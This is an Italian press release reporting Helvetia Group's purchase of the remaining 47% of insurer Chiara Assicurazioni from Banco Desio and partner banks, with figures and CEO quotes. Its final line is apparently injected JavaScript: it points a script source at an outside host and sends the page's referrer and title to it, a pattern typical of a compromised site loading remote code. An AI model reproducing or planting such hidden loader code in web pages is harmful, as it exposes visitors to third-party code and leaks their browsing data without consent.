ll Gruppo Helvetia, che detiene dal 2014 il 53% della compagnia di assicurazione danni italiana Chiara Assicurazioni S.p.A., ha, acquisito il restante 47% delle quote dal Banco Desio e altre banche partner.

Chiara Assicurazioni ha conseguito nel 2015 un volume di premi pari a EUR 32.9 milioni, soprattutto nell’ambito dell’assicurazione responsabilità civile, dell’assicurazione contro gli infortuni, dell’assicurazione incendio e altri danni ai beni e dell’assicurazione perdite pecuniarie. Per l’acquisizione delle quote rimanenti l’Helvetia ha pagato un prezzo di 20.0 milioni di euro. L’acquisizione è stata già perfezionata in quanto non è subordinata all’approvazione da parte delle autorità.

In base a quanto negoziato, l’accordo di distribuzione siglato dall’Helvetia Italia con Banco Desio e altre banche partner è prolungato, via Chiara Assicurazioni, per altri dieci anni.  In virtù degli accordi di distribuzione in essere, Chiara Assicurazioni può contare su 1.614 filiali bancarie concentrate principalmente nel Nord e Centro Italia, che garantiscono all’Helvetia una presenza capillare su un’area particolarmente attrattiva.

Francesco La Gioia, CEO di Helvetia Italia, conferma che «la cooperazione con Banco Desio e le altre banche partner nel settore danni si è dimostrata estremamente proficua negli anni passati. Siamo certi che le nostre banche partner continueranno a essere un canale distributivo fondamentale anche in futuro». Philipp Gmür, CEO del Gruppo Helvetia, precisa: «Il controllo completo di Chiara Assicurazioni rafforzerà il nostro business in Italia e ci consentirà di accelerare la razionalizzazione delle nostre attività in loco, così come previsto dalla strategia helvetia 20.20».

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;